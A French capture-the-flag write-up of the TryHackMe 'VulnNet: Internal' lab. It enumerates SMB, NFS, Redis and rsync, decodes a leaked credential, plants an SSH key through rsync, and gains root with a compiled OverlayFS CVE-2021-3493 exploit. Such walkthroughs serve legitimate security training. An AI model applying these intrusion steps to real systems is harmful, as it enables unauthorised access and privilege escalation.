VulnNet: Internal – Write Up – Fr – TryHackMe

VulnNet Entertainment learns from its mistakes, and now they have something new for you…

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

 

Enumération

Énumération avec nmap dans 1ier temps (en mode bourrin…) 

nmap -T5 -p- 10.10.57.62

Beaucoup de ports ouvert, mais pas de page web disponible. On va d’abord faire une énumération sur SMB avec enum4linux 

enum4linux 10.10.57.62

On a un partage de disponible que l’on peut mapping et listing.

Connexion au partage SMB:

smbclient \\\\10.10.57.62\\shares

Récupération de tous les fichiers avec la commande mget *

Aucune information n’est intéressante mise à part le fichier serices.txt qui contient le 1ier flag.

  • What is the services flag? (services.txt)

Redacted

Enumeration sur NFS:

showmount -e 10.10.57.62

résultat :

Export list for 10.10.57.62:
/opt/conf *

mkdir mnt

mount -t nfs 10.10.57.62:/opt/conf mnt

Il faut énumérer tous les fichiers présent dans le partage, en gros regarder dans chaque fichier à la mano…

Finalement, dans le dossier redis/redis.conf on trouve un mot de passe.

C’est la 1ier fois que je rencontre le service redis, donc je découvre et j’ai dû chercher à droit et à gauche pour récupérer des informations. J’ai trouvé ce site qui m’a pas mal aidé. 

En 1ier lieu, j’ai l’ai installé comme ceci (ça n’installe que redis-cli) :

apt install redis-tools

Énumération :

redis-cli -h 10.10.57.62 info

Réponse : 

NOAUTH Authentication required.

Ok, pas grave on a le mot de passe

Même commande, mais avec l’option -a pour l’authentification :

redis-cli -h 10.10.57.62 -a ‘redacted’ info

Avec la version 4.0.9, on peut faire des recherches sur Google, mais les exploits trouvés ne semble pas collés.

https://www.exploit-db.com/exploits/47195

https://www.exploit-db.com/exploits/44904

On continue l’énumération : 

10.10.57.62:6379> keys *

1) « tmp »
2) « marketlist »
3) « internal flag »
4) « authlist »
5) « int »

10.10.57.62:6379> get « internal flag »

« redacted »

10.10.57.62:6379> type authlist
list

10.10.57.62:6379> lrange tmp 1 100

1 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »

2 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »

3 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »

 

Information trouvé sur le site lzone.de

 

base64 decode

echo ‘QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==’ | base64 -d

Résultat:

Authorization for rsync://rsync-connect@127.0.0.1 with password redacted

Enumération rsync

 

Avec le nom du répertoire récupérer « files » on va lister les informations avec cette commande :

rsync -av –list-only rsync://10.10.57.62/files

Ensuite, on va les récupérer dans un dossier rsync qu’on vient juste de créer :

rsync -av rsync://rsync-connect@10.10.57.62/files rsync/

Il n’y a rien dans les différents dossiers d’intéressants (mise à part le flag user), et comme d’habitude, il faut toujours voir si on la possibilité de transférer une clé SSH.

Création d’une paire de clés SSH avec ssh-keygen

Transfert de la clé via rsync :

rsync -avzh ./id_rsa.pub  rsync://rsync-connect@10.10.57.62/files/sys-internal/.ssh/authorized_keys  –inplace –no-o –no-g

Escalade de privilège

Une fois connecté en SSH, il faut effectuer une énumération locale avec linpeas

On récupère ainsi la version du kernel et de la distribution

La version d’Ubuntu est vulnérable a cet exploit OverlayFS – CVE-2021-3493 . Il existe une box sur TryHackMe qui permet de tester l’exploit.  

Il faut copier l’exploit sur la box via python http-server/wget, le compiler

gcc exploit.c -o exploit

changer ses droits d’exécution :

chmod +x exploit

et exécuter l’exploit :

./exploit

#

0 0 votes
Évaluation de l'article
S’abonner
Notifier de
0 Commentaires
le plus ancien
le plus récent le plus populaire
Inline Feedbacks
View all comments